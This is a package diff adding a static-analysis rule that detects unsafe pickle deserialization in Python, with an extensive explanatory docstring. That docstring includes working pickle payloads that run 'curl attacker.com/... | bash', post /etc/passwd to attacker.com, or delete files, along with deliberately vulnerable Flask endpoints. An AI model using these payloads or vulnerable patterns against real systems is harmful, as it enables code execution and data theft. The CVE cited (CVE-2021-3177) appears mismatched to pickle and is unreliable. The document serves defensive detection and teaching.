codepathfinder 1.2.0__py3-none-manylinux_2_17_aarch64.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,479 @@
1
+ """
2
+ PYTHON-DESER-001: Unsafe Pickle Deserialization
3
+
4
+ Security Impact: CRITICAL
5
+ CWE: CWE-502 (Deserialization of Untrusted Data)
6
+ CVE: CVE-2021-3177 (Python Buffer Overflow via crafted pickle data)
7
+ OWASP: A08:2021 - Software and Data Integrity Failures
8
+
9
+ DESCRIPTION:
10
+ This rule detects unsafe pickle deserialization where untrusted user input flows directly
11
+ to pickle.loads() or pickle.load(). Pickle is Python's binary serialization format that can
12
+ execute arbitrary code during deserialization, making it extremely dangerous when used with
13
+ untrusted data.
14
+
15
+ WHAT IS PICKLE DESERIALIZATION:
16
+
17
+ Python's pickle module serializes (pickles) and deserializes (unpickles) Python objects.
18
+ Unlike JSON, pickle can serialize ANY Python object, including:
19
+ - Functions and classes
20
+ - Object instances with custom __reduce__ methods
21
+ - Arbitrary bytecode
22
+
23
+ **The Problem**: During unpickling, pickle can execute arbitrary Python code by design.
24
+ This is not a bug - it's a feature that becomes a critical vulnerability with untrusted input.
25
+
26
+ SECURITY IMPLICATIONS:
27
+
28
+ **1. Remote Code Execution (RCE)**:
29
+ An attacker can craft a malicious pickle payload that executes arbitrary code when unpickled:
30
+
31
+ ```python
32
+ import pickle
33
+ import os
34
+
35
+ # Malicious pickle payload
36
+ class Exploit:
37
+ def __reduce__(self):
38
+ return (os.system, ('curl attacker.com/backdoor.sh | bash',))
39
+
40
+ # Serialized payload
41
+ malicious_data = pickle.dumps(Exploit())
42
+
43
+ # When victim unpickles this, it executes the command!
44
+ pickle.loads(malicious_data) # RCE!
45
+ ```
46
+
47
+ **2. System Compromise**:
48
+ Attackers can:
49
+ - Execute shell commands
50
+ - Read/write files
51
+ - Steal credentials
52
+ - Install backdoors
53
+ - Modify system configuration
54
+ - Establish persistence
55
+
56
+ **3. Data Exfiltration**:
57
+ ```python
58
+ class DataExfil:
59
+ def __reduce__(self):
60
+ cmd = 'curl -X POST --data @/etc/passwd attacker.com/collect'
61
+ return (os.system, (cmd,))
62
+ ```
63
+
64
+ **4. Denial of Service**:
65
+ - Crash the application
66
+ - Consume all memory (billion laughs attack)
67
+ - Fork bomb attacks
68
+
69
+ VULNERABLE EXAMPLE:
70
+ ```python
71
+ import pickle
72
+ from flask import Flask, request
73
+
74
+ app = Flask(__name__)
75
+
76
+ @app.route('/api/load_data', methods=['POST'])
77
+ def load_user_data():
78
+ \"\"\"
79
+ CRITICAL VULNERABILITY: Deserializing untrusted pickle data!
80
+ \"\"\"
81
+ # Source: User-controlled input
82
+ serialized_data = request.data
83
+
84
+ # Sink: Unsafe deserialization
85
+ user_data = pickle.loads(serialized_data) # RCE here!
86
+
87
+ return {'data': user_data}
88
+
89
+ # Attack:
90
+ # POST /api/load_data
91
+ # Body: <malicious pickle payload>
92
+ # Result: Arbitrary code execution on server
93
+ ```
94
+
95
+ **Creating malicious payload**:
96
+ ```python
97
+ import pickle
98
+ import os
99
+ import base64
100
+
101
+ class RCE:
102
+ def __reduce__(self):
103
+ # Execute: curl attacker.com/shell | bash
104
+ cmd = 'curl attacker.com/shell.sh | bash'
105
+ return (os.system, (cmd,))
106
+
107
+ payload = pickle.dumps(RCE())
108
+ print(base64.b64encode(payload))
109
+ # Send this to vulnerable endpoint
110
+ ```
111
+
112
+ SECURE EXAMPLE:
113
+ ```python
114
+ import json
115
+ from flask import Flask, request
116
+ import hmac
117
+ import hashlib
118
+
119
+ app = Flask(__name__)
120
+ SECRET_KEY = 'your-secret-key-here'
121
+
122
+ @app.route('/api/load_data', methods=['POST'])
123
+ def load_user_data():
124
+ \"\"\"
125
+ SECURE: Use JSON for untrusted data, not pickle!
126
+ \"\"\"
127
+ try:
128
+ # Use JSON instead of pickle
129
+ user_data = json.loads(request.data)
130
+ return {'data': user_data}
131
+ except json.JSONDecodeError:
132
+ return {'error': 'Invalid JSON'}, 400
133
+
134
+ # If you MUST use pickle with trusted sources:
135
+ @app.route('/api/load_trusted', methods=['POST'])
136
+ def load_trusted_data():
137
+ \"\"\"
138
+ LESS UNSAFE: Verify HMAC signature before unpickling.
139
+ Only use this for data you control!
140
+ \"\"\"
141
+ data = request.get_json()
142
+ signed_data = base64.b64decode(data['signed_data'])
143
+ signature = data['signature']
144
+
145
+ # Verify HMAC signature
146
+ expected = hmac.new(SECRET_KEY.encode(), signed_data, hashlib.sha256).hexdigest()
147
+ if not hmac.compare_digest(signature, expected):
148
+ return {'error': 'Invalid signature'}, 403
149
+
150
+ # Only unpickle if signature is valid
151
+ obj = pickle.loads(signed_data)
152
+ return {'data': str(obj)}
153
+ ```
154
+
155
+ ALTERNATIVE SECURE APPROACHES:
156
+
157
+ **1. Use JSON** (Recommended):
158
+ ```python
159
+ import json
160
+
161
+ # JSON is safe for untrusted data
162
+ data = json.loads(user_input)
163
+
164
+ # Limitations: Can't serialize custom classes
165
+ # But that's a GOOD thing for security!
166
+ ```
167
+
168
+ **2. Use MessagePack**:
169
+ ```python
170
+ import msgpack
171
+
172
+ # Fast binary serialization, safe for untrusted data
173
+ data = msgpack.unpackb(user_input)
174
+
175
+ # More efficient than JSON, still safe
176
+ ```
177
+
178
+ **3. Use Protocol Buffers**:
179
+ ```python
180
+ import user_pb2 # Generated from .proto file
181
+
182
+ user = user_pb2.User()
183
+ user.ParseFromString(user_input)
184
+
185
+ # Type-safe, fast, secure
186
+ ```
187
+
188
+ **4. Django Signing**:
189
+ ```python
190
+ from django.core import signing
191
+
192
+ # Serialize with signature
193
+ signed_data = signing.dumps({'user_id': 123})
194
+
195
+ # Deserialize with signature verification
196
+ try:
197
+ data = signing.loads(signed_data)
198
+ except signing.BadSignature:
199
+ # Tampered data detected
200
+ pass
201
+ ```
202
+
203
+ **5. If you MUST use pickle** (internal use only):
204
+ ```python
205
+ import pickle
206
+ import hmac
207
+
208
+ SECRET = b'your-secret-key'
209
+
210
+ def safe_pickle_dumps(obj):
211
+ \"\"\"Pickle with HMAC signature.\"\"\"
212
+ data = pickle.dumps(obj)
213
+ sig = hmac.new(SECRET, data, 'sha256').digest()
214
+ return sig + data
215
+
216
+ def safe_pickle_loads(signed_data):
217
+ \"\"\"Verify HMAC before unpickling.\"\"\"
218
+ sig, data = signed_data[:32], signed_data[32:]
219
+ expected = hmac.new(SECRET, data, 'sha256').digest()
220
+
221
+ if not hmac.compare_digest(sig, expected):
222
+ raise ValueError("Invalid signature")
223
+
224
+ return pickle.loads(data)
225
+
226
+ # Still only use with data YOU control!
227
+ ```
228
+
229
+ DETECTION AND PREVENTION:
230
+
231
+ **Pre-deployment checks**:
232
+ ```bash
233
+ # Scan for unsafe pickle usage
234
+ pathfinder scan --project . --ruleset cpf/python/PYTHON-DESER-001
235
+
236
+ # Automated CI/CD:
237
+ # .github/workflows/security.yml
238
+ - name: Check for unsafe deserialization
239
+ run: pathfinder ci --project . --ruleset cpf/python/deserialization
240
+ ```
241
+
242
+ **Code Review Checklist**:
243
+ - [ ] No `pickle.loads()` or `pickle.load()` with user input
244
+ - [ ] No `_pickle.loads()` with user input
245
+ - [ ] Use JSON/MessagePack for untrusted data
246
+ - [ ] If pickle required, use HMAC signature verification
247
+ - [ ] Never unpickle data from network/external sources
248
+ - [ ] Use `json.loads()` as default serialization
249
+
250
+ **Static Analysis**:
251
+ ```bash
252
+ # Find all pickle.loads usage
253
+ grep -rn "pickle.loads" --include="*.py"
254
+ grep -rn "pickle.load" --include="*.py"
255
+
256
+ # Check if input is from untrusted sources
257
+ # (request.data, request.POST, user input, etc.)
258
+ ```
259
+
260
+ REAL-WORLD ATTACK SCENARIOS:
261
+
262
+ **1. Web API Attack**:
263
+ ```python
264
+ # Vulnerable endpoint
265
+ @app.route('/api/session', methods=['POST'])
266
+ def restore_session():
267
+ session_data = pickle.loads(request.data) # RCE!
268
+
269
+ # Attack payload:
270
+ import pickle, os
271
+ class RCE:
272
+ def __reduce__(self):
273
+ return (os.system, ('rm -rf /tmp/*',))
274
+
275
+ payload = pickle.dumps(RCE())
276
+ # POST /api/session with payload
277
+ ```
278
+
279
+ **2. Cookie Deserialization**:
280
+ ```python
281
+ # Vulnerable cookie handling
282
+ cookie = request.cookies.get('session')
283
+ session = pickle.loads(base64.b64decode(cookie)) # RCE!
284
+
285
+ # Attacker sets cookie to malicious payload
286
+ ```
287
+
288
+ **3. Redis/Memcache Cache Attack**:
289
+ ```python
290
+ # Vulnerable cache read
291
+ cached = redis.get(f'user:{user_id}')
292
+ user = pickle.loads(cached) # RCE if attacker controls Redis!
293
+ ```
294
+
295
+ **4. Message Queue Attack**:
296
+ ```python
297
+ # Vulnerable Celery/RabbitMQ
298
+ def process_task(serialized_task):
299
+ task = pickle.loads(serialized_task) # RCE!
300
+ task.execute()
301
+ ```
302
+
303
+ COMPLIANCE AND AUDITING:
304
+
305
+ **OWASP Top 10 A08:2021**:
306
+ > "Software and Data Integrity Failures - Insecure Deserialization"
307
+
308
+ **CWE-502**:
309
+ > "Deserialization of Untrusted Data"
310
+
311
+ **SANS Top 25**:
312
+ Insecure Deserialization ranked as critical vulnerability
313
+
314
+ **NIST SP 800-53**:
315
+ SI-10: Information Input Validation
316
+
317
+ **PCI DSS Requirement 6.5.1**:
318
+ > "Injection flaws"
319
+
320
+ MIGRATION GUIDE:
321
+
322
+ **Step 1: Find all pickle usage**:
323
+ ```bash
324
+ # Audit codebase
325
+ grep -rn "import pickle" --include="*.py"
326
+ grep -rn "from pickle" --include="*.py"
327
+ ```
328
+
329
+ **Step 2: Replace with JSON**:
330
+ ```python
331
+ # BEFORE
332
+ data = pickle.loads(user_input)
333
+
334
+ # AFTER
335
+ data = json.loads(user_input)
336
+ ```
337
+
338
+ **Step 3: Handle custom objects**:
339
+ ```python
340
+ # BEFORE (pickle can serialize any object)
341
+ user = User(name="Alice", age=30)
342
+ serialized = pickle.dumps(user)
343
+
344
+ # AFTER (use to_dict/from_dict pattern)
345
+ class User:
346
+ def to_dict(self):
347
+ return {'name': self.name, 'age': self.age}
348
+
349
+ @classmethod
350
+ def from_dict(cls, data):
351
+ return cls(name=data['name'], age=data['age'])
352
+
353
+ serialized = json.dumps(user.to_dict())
354
+ user = User.from_dict(json.loads(serialized))
355
+ ```
356
+
357
+ **Step 4: Secure internal pickle usage**:
358
+ ```python
359
+ # If pickle needed for internal use (never user input!)
360
+ import pickle
361
+ import hmac
362
+
363
+ def secure_loads(signed_data, secret):
364
+ sig, data = signed_data[:32], signed_data[32:]
365
+ if not hmac.compare_digest(sig, hmac.new(secret, data, 'sha256').digest()):
366
+ raise ValueError("Tampered data")
367
+ return pickle.loads(data)
368
+ ```
369
+
370
+ FRAMEWORK-SPECIFIC NOTES:
371
+
372
+ **Django**:
373
+ ```python
374
+ # Don't use pickle for sessions
375
+ # settings.py
376
+ SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
377
+
378
+ # NOT this:
379
+ # SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
380
+ ```
381
+
382
+ **Flask**:
383
+ ```python
384
+ # Use itsdangerous for signed cookies
385
+ from itsdangerous import URLSafeSerializer
386
+
387
+ s = URLSafeSerializer(secret_key)
388
+ signed = s.dumps({'user_id': 123})
389
+ data = s.loads(signed) # Safe!
390
+ ```
391
+
392
+ **Celery**:
393
+ ```python
394
+ # Use JSON serializer, not pickle
395
+ # celeryconfig.py
396
+ task_serializer = 'json'
397
+ result_serializer = 'json'
398
+ accept_content = ['json']
399
+
400
+ # NOT:
401
+ # task_serializer = 'pickle'
402
+ ```
403
+
404
+ REFERENCES:
405
+ - CWE-502: Deserialization of Untrusted Data (https://cwe.mitre.org/data/definitions/502.html)
406
+ - CVE-2021-3177: Python Buffer Overflow
407
+ - OWASP A08:2021 - Software and Data Integrity Failures
408
+ - Python Pickle Documentation (Security Warning!)
409
+ - Deserialization Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
410
+
411
+ DETECTION SCOPE:
412
+ This rule performs intra-procedural analysis only. It detects unsafe pickle deserialization
413
+ when both the source (user input) and sink (pickle.loads) are in the same function. It will
414
+ NOT detect cases where user input is passed through multiple functions before being pickled.
415
+
416
+ LIMITATION:
417
+ - Only detects flows within a single function (intra-procedural)
418
+ - Does not track dataflow across function boundaries (inter-procedural)
419
+ - May miss complex multi-function deserialization patterns
420
+ """
421
+
422
+ from rules.python_decorators import python_rule
423
+ from codepathfinder import calls, flows
424
+ from codepathfinder.presets import PropagationPresets
425
+
426
+
427
+ @python_rule(
428
+ id="PYTHON-DESER-001",
429
+ name="Unsafe Pickle Deserialization",
430
+ severity="CRITICAL",
431
+ category="deserialization",
432
+ cwe="CWE-502",
433
+ cve="CVE-2021-3177",
434
+ tags="python,deserialization,pickle,rce,untrusted-data,owasp-a08,cwe-502,remote-code-execution,critical,security,intra-procedural",
435
+ message="Unsafe pickle deserialization: Untrusted data flows to pickle.loads() which can execute arbitrary code. Use json.loads() instead.",
436
+ owasp="A08:2021",
437
+ )
438
+ def detect_pickle_deserialization():
439
+ """
440
+ Detects unsafe pickle deserialization where user input flows to pickle.loads() within a single function.
441
+
442
+ LIMITATION: Only detects intra-procedural flows (within one function).
443
+ Will NOT detect if user input is in one function and pickle.loads is in another.
444
+
445
+ Example vulnerable code:
446
+ user_data = request.data
447
+ obj = pickle.loads(user_data) # RCE!
448
+ """
449
+ return flows(
450
+ from_sources=[
451
+ calls("request.data"),
452
+ calls("request.get_data"),
453
+ calls("request.GET"),
454
+ calls("request.POST"),
455
+ calls("request.COOKIES"),
456
+ calls("input"),
457
+ calls("*.data"),
458
+ calls("*.GET"),
459
+ calls("*.POST"),
460
+ calls("*.read"),
461
+ calls("*.recv"),
462
+ ],
463
+ to_sinks=[
464
+ calls("pickle.loads"),
465
+ calls("pickle.load"),
466
+ calls("_pickle.loads"),
467
+ calls("_pickle.load"),
468
+ calls("*.loads"),
469
+ calls("*.load"),
470
+ ],
471
+ sanitized_by=[
472
+ calls("*.validate"),
473
+ calls("*.verify_signature"),
474
+ calls("*.verify"),
475
+ calls("hmac.compare_digest"),
476
+ ],
477
+ propagates_through=PropagationPresets.standard(),
478
+ scope="local", # CRITICAL: Only intra-procedural analysis works
479
+ )
File without changes